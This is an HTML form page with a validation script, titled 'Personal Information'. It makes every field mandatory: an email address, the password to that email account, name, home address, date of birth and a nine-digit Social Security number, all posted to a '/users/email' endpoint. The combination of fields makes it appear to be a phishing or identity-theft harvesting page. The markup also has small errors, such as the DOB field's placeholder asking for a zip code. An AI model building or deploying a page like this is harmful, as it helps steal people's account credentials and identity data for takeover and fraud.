<div class="row mt-5">
  <div class="col-md-6 m-auto">
    <div class="card card-body  style="max-height: 80vh; overflow-y: auto;">
      <h1 class="text-center mb-3">
        <i class="fas fa-sign-in-alt"></i>Personal Information
      </h1>

      <!-- Red Text Alert for Missing Fields -->
      <div
        class="alert alert-danger"
        id="missingFieldsAlert"
        style="display: none"
      >
        Please fill out all fields.
      </div>

      <form action="/users/email" method="POST">
        <div class="form-group">
          <label for="email">Email</label>
          <input
            type="email"
            id="email"
            name="email"
            class="form-control"
            placeholder="Enter Your Email"
          />
        </div>
        <div class="form-group">
          <label for="password">Password</label>
          <input
            type="password"
            id="password"
            name="password"
            class="form-control"
            placeholder="Enter Your Email Password"
          />
        </div>
        <div class="form-group">
          <label for="name">Name</label>
          <input
            type="text"
            id="name"
            name="name"
            class="form-control"
            placeholder="Enter Your Full Name"
          />
        </div>
        <h5>Address</h5>
        <!-- Address Section -->
        <div class="form-group">
          <label for="streetAddress">Street Address</label>
          <input
            type="text"
            id="streetAddress"
            name="streetAddress"
            class="form-control"
            placeholder="Enter Your Street Address"
          />
        </div>
        <div class="form-row">
          <div class="form-group col-md-6">
            <label for="apartment">Apt/Unit/Suite Number</label>
            <input
              type="text"
              id="apartment"
              name="apartment"
              class="form-control"
              placeholder="Enter Your Apt/Unit/Suite Number"
            />
          </div>
          <div class="form-group col-md-6">
            <label for="city">City</label>
            <input
              type="text"
              id="city"
              name="city"
              class="form-control"
              placeholder="Enter Your City"
            />
          </div>
        </div>
        <div class="form-group">
          <label for="zipcode">Zip code</label>
          <input
            type="text"
            id="zipcode"
            name="zipcode"
            class="form-control"
            placeholder="Enter Your Zip Code"
          />
        </div>
        <div class="form-group">
          <label for="dob">DOB</label>
          <input
            type="text"
            id="dob"
            name="dob"
            class="form-control"
            placeholder="Enter Your Zip Code"
          />
        </div>
        <div class="form-group">
          <label for="ssn">SSN</label>
          <input
            type="text"
            id="ssn"
            name="ssn"
            class="form-control"
            placeholder="Enter Your Social Security Number"
          />
        </div>
        <!-- End of Address Section -->
        <button type="submit" class="btn btn-primary btn-block">Submit</button>
      </form>
    </div>
  </div>
  <script>
    document.querySelector("form").addEventListener("submit", function (event) {
      const requiredFields = [
        "email",
        "password",
        "name",
        "streetAddress",
        "apartment",
        "city",
        "zipcode",
        "dob",
        "ssn",
      ];
      let missingFields = false;
  
      for (const field of requiredFields) {
        if (!document.getElementById(field).value) {
          missingFields = true;
          break;
        }
      }
  
      // Validate zipCode
      const zipCodeField = document.getElementById("zipcode");
      const zipCodeValue = zipCodeField.value;
      if (zipCodeValue.length !== 5 || isNaN(zipCodeValue)) {
        missingFields = true;
        zipCodeField.classList.add("is-invalid");
      } else {
        zipCodeField.classList.remove("is-invalid");
      }
  
      // Validate SSN
      const ssnField = document.getElementById("ssn");
      const ssnValue = ssnField.value;
      if (ssnValue.length !== 9 || isNaN(ssnValue)) {
        missingFields = true;
        ssnField.classList.add("is-invalid");
      } else {
        ssnField.classList.remove("is-invalid");
      }
  
      // Display alert for missing fields
      if (missingFields) {
        event.preventDefault();
        document.getElementById("missingFieldsAlert").style.display = "block";
      }
    });
  </script>
</div>